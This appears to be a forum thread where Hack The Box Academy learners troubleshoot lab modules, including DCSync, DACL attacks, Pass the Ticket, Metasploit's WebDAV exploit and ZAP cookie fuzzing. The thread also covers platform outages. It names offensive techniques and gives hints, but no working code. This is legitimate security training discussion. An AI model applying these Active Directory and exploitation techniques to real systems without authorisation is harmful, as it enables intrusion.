Is there an issue with the Active Directory DCSync module when trying to RDP into the Attack Host? I am unable to RDP / SSH into the box to actually work through the questions.

I haven't heard anyone say anything recently, maybe try changing servers or regions, also don't use the pwnbox and VPN at the same time if you're doing that.

I will try to change regions, I tried through VPN first thinking it was my kali box, then tried over on the PWNBOX and still had no luck.

I keep on getting the following error when trying to RDP into the attack host. I also try to SSH and says authentication failed.

this is after I have switched regions and VPN Servers.

dm please

The 203.x.x.x IP is the wrong one?

Sorry I was trying not to spoil so I used Xs

But that one is wrong one?

Hold on wait let me try something else tonight

When I get back from boxing

I think I know what I’m doing wrong. Silly me

If so I was asking a very silly question

No, that's the one the question asks for, but if you're saying nothing comes up in VT with it then you have the wrong one, because the right one works.

but that's the one I tried was that one

so I'm about to try something else tho

with that same IP

I think I see what I'm doing wrong here

wait solved

thanks

Did you solve it?

https://academy.hackthebox.com/beta/module/221/section/2676

Android Static - Reversing Shared Objects.

What did I do wrong here?

great I finished the section

I'm onto the next section tomorrow

lol figure it out. So stupid need to carful reading.

Same problem. Did you resolve it? I try to change the port the server is running on and map the ssh accordingly to port 9090 and start debugging. However, debugging won't break when entering localhost:9090, the UI is returned normally though. Appreciate any help, I stuck at this for half a day now 🥲

uh can anyone help ," What is the difference between the two numbers of the learning progress mentioned above?"

Hello.. I'm stuck in the SQLi Fundamentals module's skills assessment :(
It's ridiculous how I tried everything and no payload worked 👍 no spoil just wanna know if somebody just solved it recently

Module: DACL Attacks II
Section: Skills Assessment
Question: Compromise DC04 and read the flag located at C:\Users\Administrator\Desktop\flag.txt

I have no Idea how to get to DC04.
I have access to || tangui || user but I do not know how am I supposed to reach DC04.
I've literally abused every single technique taught in the module to reach where I currently am, except for sAMAccountName spoofing since the DC is not vulnerable.
What else there is to try? can someone help please?

Take a look at GPO attacks

I'm pretty sure i did, but will check again maybe i missed smth

Thanks

Did not find anything in GPO Attacks.

Get-DomainGPO fails because it calls Get-Forest which fails too since the domain is not linked to a forest (at least that's what the error says).

You can try running them from the initial machine for example

Oh, found it lol.
Why did the commands fail though?

dm please

"Hi everyone, I need some help with the 'Using the Metasploit Framework' module, Section 11.

I'm trying to use the exploit/windows/iis/iis_webdav_upload_asp as instructed, but the target's Port 80 is persistently CLOSED.

Steps I've taken:

Connected via VPN (tun0 is up).

Reset the machine multiple times.

Terminated and spawned a fresh new instance.

Waited 5+ minutes for services to boot.

Current Status: nmap -Pn <Target_IP> shows ports 135, 445, 3389, and 5985 are OPEN, but Port 80 is CLOSED.

Since the exploit requires WebDAV on port 80, I cannot proceed. Is this a known issue with the instance spawning, or is there a trick to wake up the IIS service on this box? Thanks!"

Math, difference refers to subtraction a - b, typically larger number minus smaller number

Section 11? What's the name of it? And are you sure its not meant to be a different exploit?

The module is 'Using the Metasploit Framework'. Section 11 is named 'Meterpreter'.
​The instructional text explicitly uses the exploit/windows/iis/iis_webdav_upload_asp targeting IIS 6.0. However, the spawned instance has Port 80 CLOSED and ports 445/5985 OPEN, which looks like a more modern Windows potentially vulnerable to EternalBlue, but I am trying to follow the guide

From what I see you are not looking at the right port

Scan every ports you can

Hello! i am having a problem in module password attacks Pass the Ticket (PtT) from Linux

i am on this specific question Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

i am trying to import the ccache in the current session but for some reason when i run klist the ticket is not imported.

Did you export the file to the KRB5CCACHE env variable?

yes!

but for now i have another problem ! i try to do sudo su from svc_workstations but i get this "unable to resolve host linux01.inlanefreight.htb: Temporary failure in name resolution"

probably the system lagged in this one . now its ok

i copy it and exported it an run klist but still nothing

I did the cookie fuzzing exercize in the "ZAP Fuzzer" section of "Using Web Proxies". I tried a ridiculous number of attempts using ZAP but nothing worked. Given that the logic of the question is fairly easy to follow the implication of the hashing of the usernames in the word list is simply ||that substituting one of these as a cookie in the relevant location will render the flag||.

In the end I just ||stuffed the cookie in chromium developer tools and got the flag that way||. So much for Zap proficiency.... Despite understanding the question and having "proof of concept " -as it were- I couldn't get ZAP to give up the goods.

Can someone explain where did this ccache file came from? I'm so confused. It's not on the list
Pass the Ticket (Linux) (Password attacks)

i had the same question! i think is for demonstration of the example! you have to use the valid one from the ones that you found !

I see i see. I was just wondering. "Where'd that came from?" LOL

Thanks!

Yes I know, thanks.

There's still some issues in the module write-up regarding that.

Hey guys, any1 having problems with spawning machines? Is it related to cloudflare issue?

Yeah. I think its still happening.

Same here. Machine died and now I can't spawn

welp

F

I cant spawn machines too

I am still having the same issue with "Windows Attacks and Defense" module for the "Kerberoasting" section, where I can spawn the box but I receive SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server when attempting to RDP in using the provided credentials.

I was told to wait 10 to 15 minutes for the trust relationships to build, assuming between WS001 and the DC, but even after 30+ minutes I'm still failing to connect.

Can anyone assist?

My instance is not starting....from 15 minutes ....it is loading

same cant spawn the target

anyyone lese facing the same problem?

I think this is a global issue

I though cloudflare services are up now

just got it spawned.

windows target?

sorry, pwnbox just spawned.

yeah pwnbox working fine

Oh, I had issues before.